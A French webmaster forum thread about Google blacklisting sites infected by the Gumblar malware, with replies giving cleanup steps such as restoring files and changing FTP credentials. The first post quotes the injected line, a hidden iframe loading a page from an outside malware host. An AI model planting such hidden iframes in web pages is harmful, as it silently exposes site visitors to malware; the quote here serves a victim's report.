Google gendarme du net

Nouveau WRInaute
Bonjour,
A cause du virus actuel gumblar, Google a blacklisté 3 de mes sites
Ce n'est pas une grosse perte pour moi, je suis en phase d'apprentissage .

Bon , d'un coté je suis pour, c'est-à-dire être prévenu que je suis sur un site potentiellement dangereux
Mais d'autre part, je me demande quelle légitimité à Google pour bloquer un site ?

Dernier point, j'espère qu'ils seront aussi rapide pour voir qu'un site est redevenu clean

Christian

PS : Sur 1&1 ou sur Ovh, mes fichiers index.php, index.htm ont eu une ligne rajoutée du style
<iframe src="http://xv8.in:8080/index.php" width=182 height=179 style="visibility: hidden"></iframe>
Sans doute du à une faille de Fillezilla
Ca se calme depuis que j'ai mis ces fichiers en lecture seule

WRInaute occasionnel
ça parait quand même normal qu'ils signalent au visiteurs que les sites sont potentiellement dangereux.
de plus, ils ne bloquent pas l'accès, il y a un lien pour y aller quand même, mais au moins le visiteur est au courant.
en plus, ils préviennent le webmaster (dans les gwt).

sinon, pour ton pb, le fait de mettre les fichier en lecture seule ne suffira pas.
la procédure à suivre :
- remettre les fichiers non infecté sur le serveur
- changer les accès ftp de ton compte sur le serveur (et donc bloquer les anciens accès)
- nettoyer ton pc (attention, beaucoup d'antivirus ne voient rien) sinon ils vont récupérer les nouveaux accès.
- mettre à jour les soft Adobe Reader et flash player sur ton pc (pas sur de l'impact mais lu plusieurs fois que la faille venait de là)
- mettre les nouveaux accès dans filezilla ou autre client ftp.

Nouveau WRInaute
Oui Epsilon,

J'ai changé mon mot de passe FTP, mis à jour Adobe Acrobat, Flash Player, passé mon PC avec les anti-virus préconisés.
Si toujours problème, il me restera à formater le PC et/ou à passer sous Linux

➡️ Offre MyRankingMetrics ⬅️

pré-audit SEO gratuit avec RM Tech (+ avis d'expert)
coaching offert aux clients (avec Olivier Duffez ou Fabien Faceries)

Voir les détails ici

coaching SEO
Discussions similaires